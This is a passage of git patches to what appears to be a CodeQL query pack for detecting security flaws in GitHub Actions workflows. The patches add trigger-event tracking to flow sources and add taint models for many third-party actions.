b/ql/lib/codeql/actions/Ast.qll @@ -22,7 +22,9 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } + WorkflowStmt getEnclosingWorkflowStmt() { + exists(WorkflowStmt w | w.getAChildNode*() = this and result = w) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 6446fbb55728..594b6017729e 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -39,8 +39,10 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(UsesExpr uses, string action, string version, string trigger, string kind | +predicate externallyDefinedSource( + DataFlow::Node source, string sourceType, string fieldName, string trigger +) { + exists(UsesExpr uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 09094f2c580c..0e82498bfc15 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -17,6 +17,8 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + abstract string getATriggerEvent(); + override string getThreatModel() { result = "remote" } } @@ -109,20 +111,33 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { + string trigger; + EventSource() { exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) + or + trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and + isExternalUserControlledPullRequest(context) + or + trigger = ["pull_request_review"] and isExternalUserControlledReview(context) + or + trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and + isExternalUserControlledComment(context) + or + trigger = ["gollum"] and isExternalUserControlledGollum(context) + or + trigger = ["push"] and isExternalUserControlledCommit(context) + or + trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) + or + trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } + + override string getATriggerEvent() { result = trigger } } /** @@ -130,10 +145,13 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; + string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } override string getSourceType() { result = sourceType } + + override string getATriggerEvent() { result = trigger } } /** @@ -145,4 +163,6 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } + + override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index e1a3479cfc0e..2d77b3473480 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -173,7 +173,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom @@ -218,7 +218,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or astTo.getRefExpr() = astFrom ) ) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 8f449f6b26db..34cb56a01ad4 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,7 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"] - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 6ee41e93826c..6fefec9a4f8f 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index f19a2da37f5e..d7cbde25b88f 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,17 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml new file mode 100644 index 000000000000..20383f415c28 --- /dev/null +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/tj-actions/branch-names + - ["tj-actions/branch-names", "*", "output.base_ref_branch", "pull_request_target", "PR base branch"] + - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fc5557db6ea9..21a0b479ef55 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,37 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 76d83bd249e1..9b6649892afa 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,5 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index 624bd32e45cb..a6baf060c9d8 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -42,6 +42,6 @@ where .asExpr() .(Statement) .getEnclosingWorkflowStmt() - .hasTriggerEvent("pull_request_target") + .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." From e1d6c7dac413e8d0b6564678998613797097468c Mon Sep 17 00:00:00 2001 From: jorgectf Date: Wed, 21 Feb 2024 15:29:27 +0100 Subject: [PATCH 065/707] Add some steps --- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 6 ++++++ ql/lib/ext/android-actions_setup-android.model.yml | 6 ++++++ .../ext/apple-actions_import-codesign-certs.model.yml | 6 ++++++ .../ashley-taylor_read-json-property-action.model.yml | 6 ++++++ .../ext/ashley-taylor_regex-property-action.model.yml | 7 +++++++ ql/lib/ext/aszc_change-string-case-action.model.yml | 8 ++++++++ .../aws-actions_configure-aws-credentials.model.yml | 11 +++++++++++ ql/lib/ext/bobheadxi_deployments.model.yml | 6 ++++++ ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 6 ++++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 6 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 ++++++ ql/lib/ext/coursier_cache-action.model.yml | 6 ++++++ ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 6 ++++++ ql/lib/ext/csexton_release-asset-action.model.yml | 6 ++++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 6 ++++++ ql/lib/ext/frabert_replace-string-action.model.yml | 4 ++-- .../ext/franzdiebold_github-env-vars-action.model.yml | 7 +++++++ ql/lib/ext/game-ci_unity-test-runner.model.yml | 6 ++++++ ql/lib/ext/getsentry_action-release.model.yml | 7 +++++++ ql/lib/ext/github_codeql-action.model.yml | 6 ++++++ ql/lib/ext/gradle_gradle-build-action.model.yml | 8 ++++++++ ql/lib/ext/haya14busa_action-cond.model.yml | 7 +++++++ ql/lib/ext/hexlet_project-action.model.yml | 6 ++++++ ql/lib/ext/jsdaniell_create-json.model.yml | 8 ++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 6 ++++++ .../ext/khan_pull-request-comment-trigger.model.yml | 7 +++++++ ...ner_circleci-artifacts-redirector-action.model.yml | 6 ++++++ .../mad9000_actions-find-and-replace-string.model.yml | 4 ++-- ql/lib/ext/mattdavis0351_actions.model.yml | 7 +++++++ .../ext/metro-digital_setup-tools-for-waas.model.yml | 6 ++++++ ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 6 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 ++++++ ql/lib/ext/ruby_setup-ruby.model.yml | 6 ++++++ ...alsify_action-detect-and-tag-new-version.model.yml | 6 ++++++ ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 6 ++++++ ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 6 ++++++ ql/lib/ext/suisei-cn_actions-download-file.model.yml | 6 ++++++ ql/lib/ext/timheuer_base64-to-file.model.yml | 7 +++++++ ql/lib/ext/tzkhan_pr-update-action.model.yml | 6 ++++++ ql/lib/ext/xt0rted_slash-command-action.model.yml | 7 +++++++ 40 files changed, 251 insertions(+), 4 deletions(-) create mode 100644 ql/lib/ext/akhileshns_heroku-deploy.model.yml create mode 100644 ql/lib/ext/android-actions_setup-android.model.yml create mode 100644 ql/lib/ext/apple-actions_import-codesign-certs.model.yml create mode 100644 ql/lib/ext/ashley-taylor_read-json-property-action.model.yml create mode 100644 ql/lib/ext/ashley-taylor_regex-property-action.model.yml create mode 100644 ql/lib/ext/aszc_change-string-case-action.model.yml create mode 100644 ql/lib/ext/aws-actions_configure-aws-credentials.model.yml create mode 100644 ql/lib/ext/bobheadxi_deployments.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-breaking-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-lint-action.model.yml create mode 100644 ql/lib/ext/cachix_cachix-action.model.yml create mode 100644 ql/lib/ext/coursier_cache-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml create mode 100644 ql/lib/ext/csexton_release-asset-action.model.yml create mode 100644 ql/lib/ext/delaguardo_setup-clojure.model.yml create mode 100644 ql/lib/ext/franzdiebold_github-env-vars-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-test-runner.model.yml create mode 100644 ql/lib/ext/getsentry_action-release.model.yml create mode 100644 ql/lib/ext/github_codeql-action.model.yml create mode 100644 ql/lib/ext/gradle_gradle-build-action.model.yml create mode 100644 ql/lib/ext/haya14busa_action-cond.model.yml create mode 100644 ql/lib/ext/hexlet_project-action.model.yml create mode 100644 ql/lib/ext/jsdaniell_create-json.model.yml create mode 100644 ql/lib/ext/jwalton_gh-ecr-push.model.yml create mode 100644 ql/lib/ext/khan_pull-request-comment-trigger.model.yml create mode 100644 ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml create mode 100644 ql/lib/ext/mattdavis0351_actions.model.yml create mode 100644 ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml create mode 100644 ql/lib/ext/mishakav_pytest-coverage-comment.model.yml create mode 100644 ql/lib/ext/mymindstorm_setup-emsdk.model.yml create mode 100644 ql/lib/ext/ruby_setup-ruby.model.yml create mode 100644 ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml create mode 100644 ql/lib/ext/shallwefootball_upload-s3-action.model.yml create mode 100644 ql/lib/ext/shogo82148_actions-setup-perl.model.yml create mode 100644 ql/lib/ext/suisei-cn_actions-download-file.model.yml create mode 100644 ql/lib/ext/timheuer_base64-to-file.model.yml create mode 100644 ql/lib/ext/tzkhan_pr-update-action.model.yml create mode 100644 ql/lib/ext/xt0rted_slash-command-action.model.yml diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml new file mode 100644 index 000000000000..73e49a1fb06c --- /dev/null +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml new file mode 100644 index 000000000000..11ea0ae79228 --- /dev/null +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml new file mode 100644 index 000000000000..2fdf6c78d53f --- /dev/null +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml new file mode 100644 index 000000000000..fb837050879e --- /dev/null +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml new file mode 100644 index 000000000000..d3b929956d1b --- /dev/null +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint"] + - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml new file mode 100644 index 000000000000..f4527cf1b7f2 --- /dev/null +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint"] + - ["aszc/change-string-case-action", "*", "input.replace-with", "output.lowercase", "taint"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml new file mode 100644 index 000000000000..f95100942954 --- /dev/null +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "env.AWS_SECRET_ACCESS_KEY", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-secret-access-key", "secret.AWS_SECRET_ACCESS_KEY", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "env.AWS_SESSION_TOKEN", "taint"] + - ["aws-actions/configure-aws-credentials", "*", "input.aws-session-token", "secret.AWS_SESSION_TOKEN", "taint"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml new file mode 100644 index 000000000000..a458e229e04d --- /dev/null +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml new file mode 100644 index 000000000000..a6cfbb6ee9e3 --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml new file mode 100644 index 000000000000..9fb754ea9e14 --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml new file mode 100644 index 000000000000..bd9563317fb5 --- /dev/null +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml new file mode 100644 index 000000000000..951a297207de --- /dev/null +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml new file mode 100644 index 000000000000..ab6458028a51 --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml new file mode 100644 index 000000000000..084e3328dc84 --- /dev/null +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml new file mode 100644 index 000000000000..b2872259fe96 --- /dev/null +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 76ce81b394e4..79fd5c76e4ae 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - ["frabert/replace-string-action", "*", "string", "replaced", "taint"] - - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] + - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml new file mode 100644 index 000000000000..8475cb66c02d --- /dev/null +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request", "PR body"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request", "PR title"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml new file mode 100644 index 000000000000..a0d4b357b5a5 --- /dev/null +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml new file mode 100644 index 000000000000..d416a71c91d6 --- /dev/null +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["getsentry/action-release", "*", "input.version", "output.version", "taint"] + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml new file mode 100644 index 000000000000..3710f7e07b8a --- /dev/null +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml new file mode 100644 index 000000000000..6ea8a6c68009 --- /dev/null +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml new file mode 100644 index 000000000000..f0e0752b7357 --- /dev/null +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint"] + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml new file mode 100644 index 000000000000..4499d91cab66 --- /dev/null +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml new file mode 100644 index 000000000000..a0f59b9e38b0 --- 